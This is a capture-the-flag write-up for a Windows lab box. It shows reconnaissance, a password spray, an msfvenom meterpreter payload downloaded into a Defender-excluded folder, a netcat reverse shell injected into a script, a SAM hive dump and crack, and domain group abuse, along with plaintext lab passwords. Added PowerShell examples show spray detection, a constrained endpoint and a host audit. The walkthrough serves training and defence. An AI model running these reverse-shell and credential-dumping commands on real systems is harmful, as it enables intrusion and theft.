```bash
nmap -p- --min-rate 10000 10.10.11.145 -Pn
```

Only one port (443) was detected, so let's run a more detailed nmap scan against it.

```bash
nmap -A -sC -sV -p443 10.10.11.145
```

Based on the hostnames shown in this scan output, I add 'atsserver.acute.local' and 'acute.local' to my '/etc/hosts' file.

We have a web application for 'atsserver.acute.local'.


From the response headers, I see that the 'X-Powered-By' value is 'ASP.NET', so let's search for directories (with the .aspx extension).

```bash
feroxbuster -u https://atsserver.acute.local/ -x aspx -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```

I found a .docx file that gives a default password; it also mentions that remote training is possible, which means RDP is enabled on some server.


I built a list of usernames from the possible names and surnames shown in the image below.


Link for remote access.

I also ran exiftool on the .docx file, which reveals the computer name 'Acute-PC01'.

The possible usernames below were all tried with the one password 'Password1!'.

```text
awallace
chall
edavies
imonks
jmorgan
lhopkins
```

I got PowerShell.
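Trying one password across a list of guessed usernames is the classic spray pattern, and it is visible on the host that processed the logons: one source address producing 4625 (logon failure) events for many distinct target accounts in a short window (on the domain controller, Kerberos pre-authentication failures surface as 4771 and NTLM validation failures as 4776). The PowerShell below is an added example of that detection logic, not something from this writeup; the window length and alert threshold are assumptions to tune per environment, and the script needs rights to read the Security log.

```powershell
# Added example (not part of the writeup): flag password-spray-like bursts in the
# Security log. Signature: one source address, many distinct target accounts,
# few attempts per account, short time window.
param(
    [int]$WindowMinutes    = 15,  # look-back window; assumption, tune per environment
    [int]$MinDistinctUsers = 5    # alert threshold; assumption, tune per environment
)

$since  = (Get-Date).AddMinutes(-$WindowMinutes)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } `
                       -ErrorAction SilentlyContinue

# Read the named EventData fields from each event's XML rather than relying on
# positional Properties[] indexes.
$rows = foreach ($e in $events) {
    $data = ([xml]$e.ToXml()).Event.EventData.Data
    [pscustomobject]@{
        Time      = $e.TimeCreated
        User      = ($data | Where-Object Name -eq 'TargetUserName').'#text'
        Source    = ($data | Where-Object Name -eq 'IpAddress').'#text'
        # SubStatus 0xC000006A = wrong password, 0xC0000064 = account does not exist.
        # A spray built from guessed names produces a mix of both.
        SubStatus = ($data | Where-Object Name -eq 'SubStatus').'#text'
    }
}

# One source, many accounts, few attempts each is the spray signature; a single
# account failing many times is more likely a typo or a lockout loop.
$rows | Group-Object Source | ForEach-Object {
    $users = @($_.Group.User | Sort-Object -Unique)
    if ($users.Count -ge $MinDistinctUsers) {
        [pscustomobject]@{
            Source        = $_.Name
            DistinctUsers = $users.Count
            Attempts      = $_.Count
            UnknownNames  = @($_.Group | Where-Object SubStatus -eq '0xc0000064').Count
            First         = ($_.Group.Time | Measure-Object -Minimum).Minimum
            Last          = ($_.Group.Time | Measure-Object -Maximum).Maximum
            Users         = ($users -join ', ')
        }
    }
} | Format-Table -AutoSize
```

Run it on the host that handled the logons (here, the remote-access server) or point `-FilterHashtable` at the domain controller's log with a `ComputerName` parameter on `Get-WinEvent`; a high `UnknownNames` count alongside a few successes is the strongest sign that the usernames were guessed from public material, as they were here.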


I tried to upload a malicious executable, but it doesn't work because of 'Windows Defender'.

I searched for the 'Windows Defender' exclusion directories via the reg query command below.

```powershell
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
```

Let's upload the malicious executable into the excluded 'C:\Utils' directory.

1. First, let's create the malicious executable via the msfvenom command below.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=1337 LHOST=10.10.16.6 -f exe -o dr4ks.exe
```

2. Let's start an HTTP server to serve this executable.

```bash
python3 -m http.server --bind 10.10.16.6 8080
```

3. Then download it via the wget command (from inside C:\Utils).

```powershell
wget http://10.10.16.6:8080/dr4ks.exe -outfile dr4ks.exe
```

On executing 'dr4ks.exe', I got a reverse shell on port 1337.


I see the live RDP sessions via the qwinsta command.

```powershell
qwinsta /server:127.0.0.1
```

Running the screenshare command in the meterpreter shell gives me a live recording of that user's screen.


I copied all of the commands from the mirrored screen.

```powershell
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred
```

I check whether these credentials work via the command below.

```powershell
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

I can read the user.txt file by running commands through this session.

```powershell
Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

user.txt
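The 'dc_manage' endpoint is a custom PowerShell session configuration, yet it lets this account run `cat` and `Set-Content` on arbitrary paths and launch a script by path, which is exactly what the rest of the chain relies on. The PowerShell below is an added example of how such a constrained endpoint is defined so that a role exposes only the cmdlets it needs; it is not the box's real configuration, and the module name, role name, group name and cmdlet list are assumptions for illustration.

```powershell
# Added example (not part of the writeup): define a constrained endpoint that
# exposes only the cmdlets a role needs. Module, role and group names are
# assumptions for illustration. Run elevated on the server hosting the endpoint.

$modDir = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\DCManage'
$capDir = Join-Path $modDir 'RoleCapabilities'
New-Item -ItemType Directory -Path $capDir -Force | Out-Null
New-ModuleManifest -Path (Join-Path $modDir 'DCManage.psd1')   # role capabilities must live inside a module

# Role capability: the caller sees exactly these cmdlets. No filesystem provider,
# no Get-Content/Set-Content, and no way to invoke a script by path.
New-PSRoleCapabilityFile -Path (Join-Path $capDir 'VolumeReporting.psrc') -VisibleCmdlets @(
    'Get-Volume',
    'Get-Disk',
    @{ Name = 'Get-Service'; Parameters = @{ Name = 'Name'; ValidatePattern = '^(Spooler|WinRM)$' } }
)

# Session configuration: RestrictedRemoteServer strips the session down to a
# minimal set of proxy commands; commands run under a temporary virtual account
# rather than the caller's own token, so the caller needs no standing admin
# rights; every session is transcribed for review.
$pssc = Join-Path $env:ProgramData 'dc_manage.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory (Join-Path $env:ProgramData 'JEATranscripts') `
    -RoleDefinitions @{ 'ACUTE\Site_Admin' = @{ RoleCapabilities = 'VolumeReporting' } }

if (Test-PSSessionConfigurationFile -Path $pssc) {
    Register-PSSessionConfiguration -Name dc_manage -Path $pssc -Force
}
```

On a domain controller the virtual account created by `-RunAsVirtualAccount` is a member of Domain Admins, so the role capability file is the only thing standing between the caller and full control of the domain: keep `VisibleCmdlets` minimal, never expose `Invoke-Expression`, the item cmdlets or anything that takes a script path, and review the transcript directory.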


I found a file called 'wm.ps1' which contains sensitive credentials.

```powershell
Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

I know that the 'jmorgan' user is a member of the 'Administrators' group (checked via `net localgroup Administrators`).


Now I replace the command in wm.ps1 with my reverse shell; my nc.exe binary must already be in the 'C:\Utils' directory.

```powershell
Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.16.6 1338') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

Then I read the file back to check that my reverse shell command is in place, via the command below.

```powershell
Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

Let's run this PowerShell script via the cmdlet below.

```powershell
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

I got a reverse shell on port 1338.


As this user belongs to the local 'Administrators' group, I can easily dump the 'SAM' and 'SYSTEM' hives.

```powershell
reg save HKLM\sam sam.bak
reg save HKLM\system sys.bak
```

I download the two files via the meterpreter shell.


Now, to dump the SAM database, I use the secretsdump.py script from Impacket.

```bash
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.bak -system sys.bak LOCAL
```

I cracked the 'Administrator' user's password hash via CrackStation.


I use this password for the 'awallace' user.

```powershell
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
```

I found a script in '\program files\keepmeon' that this user has write permission on. It is a .bat file; if I add a reverse shell to it, I can become Administrator.

I looked at Domain Admins via `net group /domain`.


I looked at a specific group called 'Site_Admin'.


I will use the .bat script to add my user to this 'Site_Admin' group via the command below.

```powershell
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

# check that the previous command wrote the file
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```
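Three host-side weaknesses carry this chain from a low-privileged account to Administrator: a Defender exclusion on a directory (C:\Utils) that ordinary users can write to, a script (wm.ps1) that embeds a plaintext password for an administrator account, and a script under Program Files (keepmeon) that a low-privileged user can overwrite but that executes with someone else's rights. The PowerShell below is an added audit example for all three, written for this writeup rather than taken from it; the roots it scans, the list of principals it treats as low-privileged, and the assumption that scheduled tasks are where privileged script execution is configured are all mine.

```powershell
# Added example (not part of the writeup): audit a host for (1) Defender exclusions
# on user-writable directories, (2) scripts that run with another principal's
# rights but that low-privileged users can modify, and (3) scripts carrying a
# plaintext password. Run elevated on the host being audited. $scriptRoots is an assumption.

$scriptRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, "$env:SystemDrive\Users") | Where-Object { $_ }

# Principals whose write access on an exclusion path or a script is a finding (assumption).
$lowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-WeakWriteAce {
    # Emit one object per Allow ACE that grants a low-privileged principal write-class rights.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        if ($lowPrivPrincipals -contains $ace.IdentityReference.Value) {
            [pscustomobject]@{ Path = $Path; Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Invoke-ScriptPathAudit {
    # (1) Defender exclusions: anything dropped in a user-writable excluded folder is never scanned.
    foreach ($p in (Get-MpPreference).ExclusionPath) {
        Get-WeakWriteAce -Path $p | Select-Object @{ n = 'Kind'; e = { 'DefenderExclusion' } }, *
    }

    # (2a) Scripts launched by scheduled tasks run as the task principal, so a
    # writable script file hands that principal's rights to whoever can edit it.
    $scriptPattern = '[A-Za-z]:\\[^"\s]+\.(ps1|bat|cmd|vbs)'
    foreach ($task in (Get-ScheduledTask | Where-Object State -ne 'Disabled')) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions carry no command line
            $cmdline = "$($action.Execute) $($action.Arguments)"
            foreach ($m in [regex]::Matches($cmdline, $scriptPattern)) {
                Get-WeakWriteAce -Path $m.Value |
                    Select-Object @{ n = 'Kind'; e = { "Task $($task.TaskName) as $($task.Principal.UserId)" } }, *
            }
        }
    }

    # (2b) Any script under the audited roots that low-privileged users can modify.
    Get-ChildItem -Path $scriptRoots -Recurse -Include *.ps1, *.bat, *.cmd -ErrorAction SilentlyContinue |
        ForEach-Object { Get-WeakWriteAce -Path $_.FullName } |
        Select-Object @{ n = 'Kind'; e = { 'WritableScript' } }, *

    # (3) Plaintext passwords embedded in scripts (the wm.ps1 pattern).
    Get-ChildItem -Path $scriptRoots -Recurse -Include *.ps1 -ErrorAction SilentlyContinue |
        Select-String -Pattern 'ConvertTo-SecureString\s+["''][^"'']+["'']\s+-AsPlainText' |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'PlaintextCredential'; Path = $_.Path; Principal = '-'; Rights = "line $($_.LineNumber)" }
        }
}

Invoke-ScriptPathAudit | Format-Table -AutoSize
```

Each finding maps to a straightforward fix: remove or narrow the Defender exclusion (exclude specific signed binaries rather than a directory, and never one that Users can write to), tighten the ACL so only administrators and the executing service account can modify scripts that run under another identity, and replace embedded passwords with a group managed service account or a credential store the script reads at run time.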


Now I can read root.txt via the command below.

```powershell
Invoke-Command -ScriptBlock { cat \users\administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
```

root.txt
